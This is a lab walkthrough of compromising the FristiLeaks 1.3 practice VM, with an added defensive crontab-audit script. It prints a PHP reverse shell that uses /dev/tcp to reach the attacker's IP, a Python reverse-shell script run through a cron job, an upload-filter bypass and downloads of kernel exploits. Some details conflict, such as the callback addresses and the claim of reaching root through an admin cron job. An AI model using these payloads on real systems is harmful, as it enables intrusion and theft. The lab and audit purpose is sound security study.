FristiLeaks 1.3 VM walkthrough
Statement
Bilibili uploader: 泷羽sec
These notes exist only to help fellow learners; the sites below are used purely for study, anything else has nothing to do with the author, and do not cross the legal red line, or you bear the consequences yourself.
Author: devoted to the network security field, currently a learner, honoured to be a sharer, with the ultimate goal of becoming a pioneer; it is both fun and very meaningful.
Personal homepage: @One_Blanks
This series takes you through the most realistic penetration environments. The articles do not hand you the answers; they walk you through information gathering and vulnerability exploitation in full and lead you step by step into the pitfalls I fell into myself. Real engagements are often far more frustrating than this, and technique only comes with practice.
Target machine:
https://www.vulnhub.com/entry/fristileaks-13,133/
1. Host discovery + information gathering
Host discovery
arp-scan -l
Target IP: 192.168.25.226
Set an environment variable
export ip=192.168.25.226
Port scan
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE
80/tcp open http
Only port 80 is open.
Service version scan
nmap -sS -sV -O -p80 $ip
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|media device|webcam
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), Drobo embedded (89%), Synology DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%)
Script scan (vuln category)
nmap --script=vuln -p80 $ip
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /robots.txt: Robots file
| /icons/: Potentially interesting folder w/ directory listing
|_ /images/: Potentially interesting folder w/ directory listing
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
2. Starting the penetration test
Visiting the web service
It is a static page, but the text at the bottom contains some useful information.
Directory brute-forcing
gobuster dir -u http://192.168.25.226/ -w /usr/share/dirbuster/wordlists/medium.txt
/images (Status: 301) [Size: 237] [--> http://192.168.25.226/images/]
/beer (Status: 301) [Size: 235] [--> http://192.168.25.226/beer/]
/cola (Status: 301) [Size: 235] [--> http://192.168.25.226/cola/]
Fingerprinting
whatweb http://192.168.25.226
http://192.168.25.226 [200 OK] Apache[2.2.15], Country[RESERVED][ZZ], HTTPServer[CentOS][Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3], IP[192.168.25.226], PHP[5.3.3], WebDAV[2]
http://192.168.25.226/sisi/
http://192.168.25.226/cola/
http://192.168.25.226/beer/
Three identical images.
This isn't the right URL, so we are probably meant to find the correct one.
Brute-force search
cewl http://192.168.25.226 -w url.txt
Here we go straight to the cewl tool: it crawls the site, collects the words on it and builds a wordlist from them.
Then we hand that wordlist to gobuster for a directory scan.
This leads us straight to the login page:
http://192.168.25.226/fristi/
The information we gathered earlier:
sisi
cola
beer
@meneer, @barrebas, @rikvduijn, @wez3forsec, @PyroBatNL, @0xDUDE, @annejanbrouwer, @Sander2121, Reinierk, @DearCharles, @miamat, MisterXE, BasB, Dwight, Egeltje, @pdersjant, @tcp130x10, @spierenburg, @ielmatani, @renepieters, Mystery guest, @EQ_uinix, @WhatSecurity, @mramsmeets, @Ar0xA
can be used to build a wordlist for a weak-password brute-force attempt.
Looking at the page source, we find some encoded data:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
It looks like base64, so we decode it directly.
The decoded output is not readable as text, but the first line of the blob (iVBORw0KGgo) tells us this is a PNG file, so we rename the decoded file to .png:
mv base64.txt base64.png
We get an image like this:
keKkeKKeKKeKkEkkEk
Combined with the username eezeepz from earlier,
we try it, and the login succeeds.
A normal upload is blocked. The fingerprint showed an old Apache version, so we bypass the filter with a multi-extension file name.
The upload succeeds, and we check it in the uploads directory:
http://192.168.25.226/fristi/uploads/phpinfo.php.png
We then upload a PHP shell that connects back to us:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.25.132/4444 0>&1'");?>
nc -nvlp 4444
Remember to start the listener on Kali first, then upload the file and visit it:
http://192.168.25.226/fristi/uploads/php%E5%8F%8D%E5%BC%B9.php.png
3. Getting an initial foothold
4. Privilege escalation
id
uname -a
Linux 2.6.32
The kernel version is quite old, so we look straight for an exploit to escalate privileges.
searchsploit -t Linux 2.6.32 | grep Privile
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | linux/local/25444.c
We use this CentOS exploit for privilege escalation.
searchsploit -m 25444
python -m http.server 800
Start the web server on the attack machine, then use wget inside the shell to download the exploit.
cd /tmp      (we have no write permission in the other directories)
wget 192.168.25.132:800/25444.c      (download command)
head -n 20 25444.c      (read the usage notes)
gcc -O2 25444.c && ./a.out      (invalid argument; privilege escalation failed)
We try a different exploit.
searchsploit -m 9844
wget 192.168.25.132:800/9844.py
python 9844.py      (run it)
It fails as well.
So we go back to information gathering.
cd /home/eezeepz
ls -liah
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
The note tells us a scheduled task (cron job) has been set up for this.
So we write a file that the job will execute, with a command that connects back to us:
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.30.182",8421));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
Start the web server and download it with wget:
wget http://192.168.25.132/rc.py
echo '/usr/bin/python /tmp/rc.py' > runthis
Privilege escalation to root succeeds.
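Added example, not part of the original write-up: a small audit that parses /etc/crontab-style entries and flags jobs that read, write or execute files in world-writable directories, which is the misconfiguration behind the runthis note above. The sample crontab and the /home/admin/cronjob.py path are constructed assumptions, not the VM's real files.

```python
import re
import shlex

# Directories any local user can write to. A cron job that reads, writes or
# executes a file in one of them can be hijacked by whoever plants that file,
# which is exactly what the "runthis" note on this VM describes.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# /etc/crontab format: five time fields, the user to run as, then the command.
CRONTAB_RE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def system_crontab_entries(text: str):
    """Return (user, command) pairs from /etc/crontab-style text,
    skipping blank lines, comments and VAR=value assignments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRONTAB_RE.match(line)
        if m:
            entries.append((m.group("user"), m.group("cmd")))
    return entries

def risky_paths(command: str):
    """Tokens of a cron command that point into a world-writable directory."""
    try:
        tokens = shlex.split(command)
    except ValueError:          # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    return [t for t in tokens if t.startswith(WORLD_WRITABLE_DIRS)]

def audit(text: str):
    """List (user, command, [risky paths]) for every job touching such a path."""
    return [(u, c, risky_paths(c)) for u, c in system_crontab_entries(text)
            if risky_paths(c)]

# Constructed sample crontab. The admin job models the note in notes.txt
# (commands read from /tmp/runthis, output to /tmp/cronresult); the script
# path /home/admin/cronjob.py is assumed, the VM's real file is not on the page.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
* * * * * admin /home/admin/cronjob.py /tmp/runthis > /tmp/cronresult 2>&1
0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * root /bin/bash /dev/shm/update.sh
"""
```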